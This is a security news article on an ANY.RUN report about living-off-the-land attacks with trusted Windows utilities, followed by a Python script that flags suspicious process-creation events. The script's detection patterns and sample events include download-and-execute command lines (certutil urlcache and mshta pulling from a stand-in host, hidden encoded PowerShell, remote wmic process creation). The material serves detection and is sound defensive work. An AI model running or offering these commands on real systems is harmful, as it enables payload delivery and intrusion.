Cybercriminals are increasingly abusing legitimate system tools to launch trusted-tools malware attacks while avoiding detection. According to a recent Q1 2026 Cyber Risk Report from ANY.RUN, attackers are relying more heavily on trusted Windows utilities to gain access, steal credentials, and deploy malware without triggering traditional security defenses.
Because these tools are already installed on most systems and commonly used by administrators, malicious activity can easily blend in with normal operations.
ANY.RUN Report Reveals Growing Threat
According to ANY.RUN’s analysis of more than 2 million malware and phishing investigations during the first quarter of 2026, threat actors are rapidly shifting toward stealthier attack techniques.

The report highlights:
- Loader-based attacks nearly doubled
- Credential theft increased significantly
- Living-off-the-Land (LotL) techniques grew by more than 58%
- Attackers increasingly abused trusted system utilities
- Malware campaigns became more automated and difficult to detect
Researchers noted that attackers often use tools such as PowerShell, WMI, Certutil, MSHTA, and JavaScript execution environments to perform malicious actions while appearing legitimate.
These trusted tools allow attackers to:
- Download malware payloads
- Execute fileless attacks
- Establish persistence
- Move laterally through networks
- Avoid traditional antivirus detection
Security experts warn that attackers can establish persistence within seconds, leaving defenders with very little time to respond.
Credential Theft Continues to Drive Attacks
ANY.RUN researchers found that credential theft remains one of the primary goals for modern threat actors.
Once attackers obtain valid credentials, they can access systems while appearing to be legitimate users. Combined with trusted tool abuse, this creates a dangerous scenario where malicious activity can remain hidden for extended periods.
Many attackers begin with lightweight loaders that quietly gain initial access before deploying more dangerous payloads such as:
- Ransomware
- Remote Access Trojans (RATs)
- Information stealers
- Credential theft tools
This approach allows cybercriminals to scale attacks while minimizing detection.
Strengthening Defenses Against Trusted Tool Abuse
Because legitimate tools generate normal-looking activity, ANY.RUN recommends focusing on behavioral monitoring rather than relying solely on traditional signature-based security solutions.
Organizations should monitor for:
- Unusual PowerShell commands
- Suspicious script execution
- Abnormal command-line arguments
- Unexpected network connections
- Unusual administrative activity
- Suspicious parent-child process relationships
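The behavioral checks in the list above can be expressed as simple rules over process-creation telemetry. The following script is an added example and is not code from ANY.RUN or the report; the event fields (parent_image, image, command_line) mirror the usual shape of Sysmon Event ID 1 or EDR process logs but are an assumption here, and every sample event, host name and URL in it is constructed for illustration.

```python
"""Behavioral triage of Windows process-creation events for trusted-tool abuse.

Added example, not from the ANY.RUN report. Event field names follow the
common shape of Sysmon Event ID 1 / EDR process telemetry (an assumption).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str = "CORP\\user"      # constructed placeholder account


@dataclass
class Finding:
    rule: str
    event: ProcessEvent


# Command-line rules keyed on the executable name. Each entry is
# (rule name, regex applied to the lower-cased command line). They cover the
# behaviours the page lists: payload download, fileless/hidden script
# execution, and remote process creation for lateral movement.
COMMAND_LINE_RULES = {
    "certutil.exe": [
        ("certutil used as downloader/decoder", re.compile(r"-?(urlcache|decode)\b")),
    ],
    "mshta.exe": [
        ("mshta executing remote or inline script",
         re.compile(r"(https?://|javascript:|vbscript:)")),
    ],
    "powershell.exe": [
        ("PowerShell encoded command", re.compile(r"-e(c|nc|ncodedcommand)?\s")),
        ("PowerShell hidden window / bypass",
         re.compile(r"-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass")),
        ("PowerShell web download cradle",
         re.compile(r"(downloadstring|downloadfile|invoke-webrequest|iwr\s)")),
    ],
    "wmic.exe": [
        ("WMI remote process creation", re.compile(r"process\s+call\s+create")),
    ],
}

# Parent-child rule: Office applications should not be launching script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list[Finding]:
    """Apply all rules to one event and return the findings (empty if benign)."""
    findings: list[Finding] = []
    image = basename(event.image)
    parent = basename(event.parent_image)
    cmd = event.command_line.lower()
    for rule_name, pattern in COMMAND_LINE_RULES.get(image, []):
        if pattern.search(cmd):
            findings.append(Finding(rule_name, event))
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding(f"Office application {parent} spawned {image}", event))
    return findings


def triage(events: list[ProcessEvent]) -> list[Finding]:
    """Evaluate a batch of events; returns every finding in input order."""
    return [f for e in events for f in evaluate(e)]


def summarize(events: list[ProcessEvent]) -> dict[str, int]:
    """Count findings per rule, useful for a quick dashboard or hunting pivot."""
    counts: dict[str, int] = {}
    for f in triage(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry: one benign admin command, one Office-spawned
# hidden/encoded PowerShell, a certutil download, an mshta remote script, a
# benign certutil use, and a WMI remote process creation.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile Get-ChildItem C:\Logs"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc PLACEHOLDERBASE64=="),   # placeholder, not a real payload
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://example.invalid/update.txt update.txt"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://example.invalid/page.hta"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -verify server.cer"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\wmic.exe",
                 "wmic.exe /node:fileserver01 process call create notepad.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.event.parent_image} -> {finding.event.command_line}")
    print(summarize(SAMPLE_EVENTS))
```

The rules are deliberately keyed on image name plus command-line shape and parent process rather than on file hashes, which is the point of behavior-based detection for tools that are legitimately present on every host: the benign `Get-ChildItem` and `certutil -verify` events produce no findings, while the Office-spawned hidden, encoded PowerShell fires three rules at once and would be an obvious candidate for rapid response.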
Additional recommendations include:
- Enforcing least-privilege access
- Restricting script execution
- Using application control policies
- Leveraging threat intelligence
- Deploying sandbox analysis solutions
- Improving incident response capabilities
The findings show that attackers are becoming increasingly skilled at hiding in plain sight. As trusted tools continue to be weaponized, organizations must focus on behavior-based detection and rapid response strategies to identify threats before they can cause significant damage.